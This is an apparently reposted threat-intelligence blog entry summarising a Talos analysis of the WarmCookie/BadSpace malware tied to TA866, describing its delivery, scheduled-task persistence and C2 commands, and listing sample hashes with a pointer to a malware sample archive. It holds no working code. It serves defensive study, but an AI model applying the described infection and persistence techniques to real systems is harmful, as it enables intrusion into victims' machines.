2024-10-23 WarmCookie/BadSpace - APT TA866 - Samples
2024-10-29 11:22:0 Author: contagiodump.blogspot.com(查看原文) 阅读量:10 收藏

 2024-10-23 TALOS Threat Spotlight: WarmCookie/BadSpace

Summary: WarmCookie, also known as BadSpace, is a sophisticated malware family that emerged in April 2024, primarily distributed through malspam and malvertising. This malware provides long-term access to compromised environments and facilitates the deployment of additional payloads, such as CSharp-Streamer-RAT and Cobalt Strike. Its infection chains and functionality highlight notable development links to Resident backdoor, indicating possible shared authorship by TA866.

WarmCookie’s infection chain initiates through email lures—typically invoice-related and job agency themes—that direct victims to malicious JavaScript-hosting servers. The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL, embedding itself in the system with persistence.

Persistence: WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay. The latest version modifies the typical command-line syntax from /p to /u for execution parameters.

Command-and-Control (C2) Adaptation: TA866 previously used unique, detectable C2 user-agent strings (e.g., Mozilla/4.0 (compatible; MSIE 6.0…)), which have since been updated to blend with standard strings like Mozilla/5.0… Firefox/115.0.

Self-Updating Mechanism: An initial implementation of a self-update command allows WarmCookie to receive updates dynamically from its C2 server, although this feature appears incomplete.

C2 Command Updates

The latest WarmCookie samples feature new C2 commands:

Command 0x8: Receives a DLL from C2, assigns it a temporary filename, and executes it.

Command 0xA: Similar to Command 0x8 but adds hardcoded parameters, allowing self-updating.

Command 0xB: Moves the malware to a new temporary filename and deletes the scheduled task to disable persistence and terminate the malware process.

Code and Function Similarities to Resident Backdoor

A code-level comparison between Resident backdoor and WarmCookie shows:

RC4 Decryption Consistency: Both use identical RC4 implementations and mutex management, often employing GUID-like strings for mutexes.

Startup Logic: Both use similar logic for identifying execution as a DLL or EXE and establishing persistence through scheduled tasks. They both use rundll32.exe for DLL-based execution and task scheduling.

Coding Conventions: Functions, parameter passing, and persistence mechanisms align closely, suggesting shared development practices or authorship.

File Information

  • ├── 0b26abc692b7a2877b6b6fce6aa99b29af125b063f1c41b507362def59f8dfce
  • ├── 0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17
  • ├── 0d2cf14d27586ff9da5832e0efaba872a1641617fdb4a47d94b645172f7d2fa6
  • ├── 0d305291091bcb0c943c6472dce450272b2291b6287a053c5c553f082654c718
  • ├── 0d59c9bef911c879011f21163a083c09b759c9757f1ade9da9f87fdce27dc5f4
  • ├── 0da87bff1a95de9fc7467b9894a8d8e0486dfd868c2c7305e83951babacde642
  • ├── 0f11caad7cd5cf4de78145a13590fb50a42a63aaf3bbc6066d2a0bb58a2068f7
  • ├── 124e2b15b001eb302f0a5f43604621a001d250d42afdf353dc812f41bf249a55
  • ├── 13142aa3c815362511acee0b74672081d7bb8cd3cabd8ab4c85fb7ba8126aec5
  • ├── 13ccffd00e2fa89167e29a8d382d8c417e198ffce8684df23e4a8a91fdc0f23e
  • ├── 15b1eb1072de7e16d5b7693a16269b315c0926558fa2cbbcd2948c2dd16ab8a0
  • ├── 193cadbea116833efaaa0bc6fbea552a68c9694fb0177ad873d702001b4cef8d
  • ├── 1bcfed8b593a8a7c8b34e074aca3d4fc68a0ea3343b32eae89fdabf35ad40e7d
  • ├── 1d9f4690a62fd4d17c031924585b1e46e417d8c72f331ba51cf0eceeb91f6579
  • ├── 1dd740062b30ce02e90238d55cb6f786496e120a40e93334fef7033e75d46d79
  • ├── 1ea681b79f88c2f0e9344beedb8776643d735c3f8251479c9495537c40fe5ba1
  • ├── 283cd2138b4f1ffef36411adee02f5d684593bdf3117c760ade04e19c958028a
  • ├── 295d01d02376044ec078128788b4439eba63184147f0137852160952ad1649c2
  • ├── 2a311dd5902d8c6654f2b50f3656201f4ceb98c829678834edaeae5c50c316f5
  • ├── 2a4451ef47b1f4b971539fb6916f7954f80a6735cf75333fa9d19b169c31de2e
  • ├── 2a5a12cc4ef2f0f527cc072243aa27d3e95e48402ef674e92c6709dc03a0836a
  • ├── 2cbd9f49b2dec8a36e0961b5471bdb3266a5c061ba8784e14a193e700d156a0c
  • ├── 2f434cc508baac8440e95e955306ee354e76680eedca4a3ec2d87f592cfdcba7
  • ├── 30a85fa1bf6df41d841efbf986beb286eb829380ebfdf0c1ac694f3d4f24315a
  • ├── 32ff6653fb6e4757c1f7206af26475445e1e43c8e1db0af5309ad8a9c4d86ba1
  • ├── 33f81ee6d9747afe1c7c5a6ed741822749ea42bb297eb642f720fd44ae35e786
  • ├── 34f2fc85932f6fede57846cf2a2d55172d28e4a251bb4434a88a02ce8ec030f0
  • ├── 38f4b197dcda32b14dc98127e3a523364822e108f85153105b77b85ce31438d7
  • ├── 3f073189506b7ca07fb352e267699688bd3a6c11cde72217ec1ffbae211b6e15
  • ├── 40cdac6696e84f677d7e4817fd85f32da0f9256866bb85a25da207e3d5ca7d5c
  • ├── 41d9d1e0599b492fdb6fa2ce47f0094112799830dd8dc1c098690a500a8fa6b1
  • ├── 425da6a7bd4faedc97990c6458d5e6a0635839037a99611385b77b43b443d1ec
  • ├── 43b87cf9b5a73d9bdfdbd9e1da3cb4d1e26a509d328a90c01cc0025a9cb1698f
  • ├── 44faed020d5d8b29918a3f02d757b2cfada67574cf9e02748ea7f75ba5878907
  • ├── 475edfbb2b03182ef7c42c1bc2cc4179b3060d882827029a6e67c045a0c1149b
  • ├── 48320e88c9188d97e7f6a06eddcc8e1f89cf79ed66b68a546cd38e76f183b13e
  • ├── 48640e2fb35f073c22937784f32c157d9a0781d61a2293f73fc3566b708205bd
  • ├── 4b4e27824cd349192cf0913060f1481a192f2b13d44e2787edbe8d7f0c57fa06
  • ├── 4cccc2d7f97a78dd0ef3f06a2fdb555299cd06c4222dd546d87a4ed735743d48
  • ├── 4e731e9e0233d53c70830011690f59b0764f61aa19e49cd10bed92b6eb81762c
  • ├── 4ff20a31223f3c0a04f1646332979c89fce5111f9d288b69568c9120d13c564c
  • ├── 53db2f135883d74dcac2e620d14d7f775876bf49d3d5d4fdb131f8fed4917434
  • ├── 5428e75adfc1f8d9b551f0e912db89c9f82db0bb574a80553b2ee8a829668d18
  • ├── 55ace018a6c4f355511ce3f6833d4b997d4323afb890520dc815aa2f916499f3
  • ├── 5649dcd896bf2155e790c5f05b9fa2ba6fe5befcac85a8cb0beed23945686e02
  • ├── 56984cac7431ef001246350eaa6011cf2f34571e231b29572d27f962f6c7f165
  • ├── 56f9bd572b3d7c65da3d50d77a71fec0f8b4320f7bf7f691221522ac62e5d99b
  • ├── 5970ba228d2afe2031b8e8c17ba284746ebb9066f0ccb8e1fe33a6e3927a6c97
  • ├── 5ab9b4e3f15a04bfe240368d9cea4e6fccbf88c89358e9316055e3f79ca10fd7
  • ├── 5b360b6855e87f173b4429adcca1d5f7735112119d69a5e9268673ab5ac82394
  • ├── 5ca2106d823eeee827f228b8a1caf6e769ce7cefea6da72f537e2e302f10f13b
  • ├── 5cd47f178fd5afc2c290c77695277183df54d886f444f5993bbbe169eb3e2b12
  • ├── 60a43c829aaf03c42d012c0f61501e87864c19896d43f61f990d5be9a822eb9b
  • ├── 60cd63e288c4054f85c9ea8167e0e58c1bd9998a15e3f8ed211132b42f76bdb6
  • ├── 613e6a8a49a61f157a8e064b7fbc7bd5d59909d47e31f6c18cd5c5659808ee89
  • ├── 616b1e1127902cef942cbc8ba6b89fe2e3090e992c7ae5e08c7d54b508b0caab
  • ├── 62a653ff8e81f7ed05a1415a2ea679a993d5c1b0abd0ea93aff82dc10142629f
  • ├── 62fb7f43c677ee2fe56406e7af8876289d3751e7c001aa627dd287baf5687f06
  • ├── 63537e464742099cfaf06904676e8955c0543a621e1936297e49090587a84ac1
  • ├── 668e1270bdb9a3aba41389777fc1ccd8759ad1316c62ea7c3f711925b44ef0b6
  • ├── 669e721ddb304f09ad60a7e166710a08e37a42f6a8cd5bc47a21fa0342292507
  • ├── 676cbcaa74ee8e43abaf0a2767c7559a8f4a7c6720ecc5ae53101a16a3219b9a
  • ├── 67984703c89ee30cadaa8d7dd5c1a0e9f7f5d096ab0d6d03fdb01115780fa7c3
  • ├── 6a195e6111c9a4b8c874d51937b53cd5b4b78efc32f7bb255012d05087586d8f
  • ├── 6ac099ab5132a17bf7a492b47442f0f6776eb76d702a5c2d947dab0ab33cfc45
  • ├── 6c41faafcf01000547c1e327c7366a89b4d5f9e64de2da404c34954990f7e1fa
  • ├── 6cd8a62fb051c17da53b46bc05c6407eab58582c531f8dd18553ecd2b3b37411
  • ├── 6db0d6eaff5279d815e66e1abbdd7e4159c58c7747b158659d875c369c153b89
  • ├── 6fb83280ffc0feddf3f346a4d3a8914f26c097b8aef3a276590ea44ce9d70204
  • ├── 71053c8a336c10154dadd4572c00e45e177b2f29470bd7171b28e49ab855def0
  • ├── 712738c0afe1d10f28b6aefecb44f2bc442007fdd65f8f07582120e3ec22d590
  • ├── 748e247912e4f40c685c4b756cd9bfbc39c7b3fcd649cd85f83c67c4cdd8a62d
  • ├── 770cafb3fe795c2f13eb44f0a6073b8fe4fb3ee08240b3243c747444592d85ff
  • ├── 7b340050fe9bec7024092de63d223d2a96a32d14676f6c82c9024278ae0b323e
  • ├── 7b7dbd54308cacec5c591dbd6a2b9f90368f986572c3edcbfedca7812b409347
  • ├── 7c49024676be4f90d905028675d4a714311f971c099ab01e3cd26cd13c68499c
  • ├── 8087f6755ef54c99000517a5bf5a94ceeb43ee34d2774051c616b51e8d827e0a
  • ├── 824438852f5f11bef8a60df08f6746abf869c52e288456f4cefb97910ae2fcd7
  • ├── 83218a0beee310a8056ca62946a5f8ca742787e49cf2b4f93e29c4940d3961c9
  • ├── 84519a45da0535087202b576391d1952a4cc81213f0e470db65f1817b65ee9d7
  • ├── 87ce3aaf800b7a80f82d38fd6ff60925814dbe611786c29040bc9fcfa9943fd3
  • ├── 87f57a7a4b4c83ecb3cdd5f274c95cd452c703de604f68aff6e59964b662e3f8
  • ├── 8d81f6af61f019c56ade65dc80a8b8332f8d141fa11714bc2f5594242661d8a3
  • ├── 8e8cebab33731844245e5f70e90933c37a19010bf893027ad7af2a92e1d56244
  • ├── 8f7b7f3da174d8ff41b2bc86e363d00d198d79cf52de078a3a5f6b55352bceb8
  • ├── 90b85d2ca44186de6df202abf27e3737c52691bf5dd28841fba8860bdc4483f8
  • ├── 927e941acb5bc42ff2050ad04fdb6e21d33f9b02cb3fc279dfee2f814557d8e5
  • ├── 95831ac07e5f732817af71fc4a9f33b707a656078cff6a58042bbd07bdb9bbbd
  • ├── 959098a5c53f7a16fa644152aa4ffe52a989b24c1c5f87a23ae74719aab82238
  • ├── 962e21e349a00ef86d1c094b7ef6e80a5c99b98c1165f3fc318a55deff25731f
  • ├── 975deab236438b6d7fa3ad1be7d9c2a3fabbd6103ff5f8b7fe536205ad715508
  • ├── 9a27a2ad96f7676d28f99ffc4cbc51a81b42c7739fc15a0e57295b028d6c830d
  • ├── 9bc4c44b24f4ba71a1c7f5dd1c8135544218235ae58efa81898e55515938da6a
  • ├── 9d143e0be6e08534bb84f6c478b95be26867bef2985b1fe55f45a378fc3ccf2b
  • ├── 9d4c80ea1d6d1ce11f9bb79d7a5a4ddfcea9f20ffe039db7215e9c57fc183476
  • ├── 9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330
  • ├── a0916d3b97c0df2ec1ed6a772dac27c24842a64d4f6e078c941fa2046cabb9ed
  • ├── a16ec983d5d2d7d4373da2faede5457ee5587b36e5bfd737a6c6d2c42ff7266f
  • ├── a1cb61abc99eb58e30ae7a9908c260be26ce072400ad771532bfe7c039ce10ef
  • ├── a20c9fe2888286473faea909d2f22a75a1b982387b08e2ba0bd091ae631f36fc
  • ├── a5f16fa960fe0461e2009bd748bc9057ef5cd31f05f48b12cfd7790fa741a24e
  • ├── a725883bd1c39e48ab60b2c26b5692f7334a3e4544927057a9ffbdabfeedf432
  • ├── ab8cd83f855445bd9486be0960b2dbb038c313165f2a9eb7cc5eecf96c344be6
  • ├── ad2333e1403e3d8f5d9bd89d7178e85523fa7445e0a05b57fd9bc35547ec0d98
  • ├── b3415b4f3524ac4df8fcff649b986d0ffe3874050bf48f0f1949c745c9e51d46
  • ├── b54b42b4dfb93502646e9e8cb0eb5b65dccf2b872ab79f67641e307a08234b94
  • ├── b6ac7f6e3b03acd364123a07b2122d943c4111ac4786bb188d94eae0e5b22c02
  • ├── b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
  • ├── b9278ecce14213a1920ca9cc2b23ee18641c07a2780b693f009dcac578ffef92
  • ├── ba4c8be6a1eb92d79df396eea8658b778f4bc0f010da48e1d26e3fc55d83e9c7
  • ├── bb74c6fc0323956dd140988372c412f8b32735fb0ed1ad416e367d29c06af9cc
  • ├── bfcb215f86fc4f8b4829f6ddd5acb118e80fb5bd977453fc7e8ef10a52fc83b7
  • ├── c36749f11be375b6f103ff973255b6d32ed816ba27c158adea087de7546045da
  • ├── c437e5caa4f644024014d40e62a5436c59046efc76c666ea3f83ab61df615314
  • ├── c64cb9e0740c17b2561eed963a4d9cf452e84f462d5004ddbd0e0c021a8fdabc
  • ├── c6c777beb38120497e6b26fea8f376652eafb5b661c65a87265421dc83f61121
  • ├── c7fc0661c1dabd6efd61eaf6c11f724c573bb70510e1345911bdb68197e598e7
  • ├── c8f3947a5d377064640358cfb0320de30324eb6d66789afaf1e4cd1a8dbb187b
  • ├── cbd7ba0886a3e0d60b15bed0736bfaa130d47ab247e374d79c3612ce6ce049b6
  • ├── ccde1ded028948f5cd3277d2d4af6b22fa33f53abde84ea2aa01f1872fad1d13
  • ├── ccf29931f8bddd1888912ba5def598bf73c29bb20be50e44f60d36e3c0296c8b
  • ├── cd9aebcc686a8a2eb25bf5d75100b28f58aad6512222ade6630bbad59e877369
  • ├── cec5bfbbd96c9a150d740c5be7d1d86c35ade0611085de537b8d1ca4887f2780
  • ├── cee576f6d4d05bfb4f0e0704a4712af10b0afcb369407f5edf3526145a53a685
  • ├── cf2e04d01b3de16d9aaa90c0d95775c9a99e63b23cc42043046ba31725d80e2e
  • ├── cfa312272a7e55330855325925cc449a9ca8f80626d1003b0981c4375fad69a3
  • ├── d20903e4f8635fc8f8a7d1ab2330a61eb1fad29e03c353ede85bc359aa019f2c
  • ├── d4c140b094dd3f278e8b99aa504419d2c2dc9bdb4169dc5eaaf55c187fd2f011
  • ├── d4c955b1db1e499ea47196b8f630205329f9277f3cc184d75a3b69a70d8c49da
  • ├── d596868e19902772b38e91a6421ae72750e02445cdb6d24a9b3e78931c1d1ffd
  • ├── d7cfd49c873810b2f3369af4f8e8d0bac57c83137b1cd173f2f79a8d5f0898b9
  • ├── db7827bb6788f0a7dae5ef2dc0f3c389ab2616fabed27d646b09ecceb7c1eea9
  • ├── ddbcce9bb969bda17064796c25abcc346748e7cd5d9d0460672d8d09ea97d24f
  • ├── de6dbd27a07500e11af05f0420902c4d172aa34f6681d3f1546cf5b5872b3310
  • ├── e04562fb05388e10d6d70d4cadbec059c6c0601f8232d8699ad8a6d3ee0e75d6
  • ├── e2c7fb642d9227013695257561a77f9164f992615082b85fe973dde2934ecf1c
  • ├── e4a9105c3c44cd3f0f975f807127aae121b67c561240fefdce215c715695d5be
  • ├── e640676b0ff2ba116d8cea36cd7103a5897eb29e9c8a297bb8883b83972565a1
  • ├── e79e1858fdd8cb7642f0df4b2f696126df1bd6fc5f4731af8d797e02273f307f
  • ├── e8ca376afa8e85fcd0487c25fd8330455cd2a5ea17aeaed95e9fd085d81035c8
  • ├── e94f9221944a764f220831eb421d4571b32e5b243aad4943b69ae2bcfb176737
  • ├── ebc0ded53cd49db7ea646bd02f391dee05f6093ec26300a7389ae2ef8d769a6f
  • ├── ec4217947c398d6aa335436b8da830e66557031dd1ec152e33093c8cc8466077
  • ├── eca43317ae815a18eeaf723506c960a9b2edc39f127e5a200011e594e0ab31e2
  • ├── eec7ed30a026ba5ba82c288693bb6ad16cfc5643768bb89e5a0b17109d1fc7a6
  • ├── f036314c1ce294070c181bc0bc8af837679b1aeafbf2497799c065cbadc72474
  • ├── f0ce1e9db6418c488beb9be3b205d4c16afbbed6be20eebe8445d9cdbfc23dde
  • ├── f31e28b2fd8efe63a7a2c39f7f87d895c44694d80b5fcbff91d51dc63eafa9dc
  • ├── f4d2c9470b322af29b9188a3a590cbe85bacb9cc8fcd7c2e94d82271ded3f659
  • ├── f57dcff87305797c6488b8a45b2d48c1c119cc19a316f452c04b38e30090477d
  • ├── f7fce1a38543f29336e8ae8ab659370ce21734acb2b5d86426f64143a9e3bf41
  • └── fa02d4d18b61842ab7166d6274e6b941342be58372f2a903e293554bbb07dd45
    Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.


文章来源: https://contagiodump.blogspot.com/2024/10/2024-10-23-warmcookiebadspace-apt-ta866.html
如有侵权请联系:admin#unsafe.sh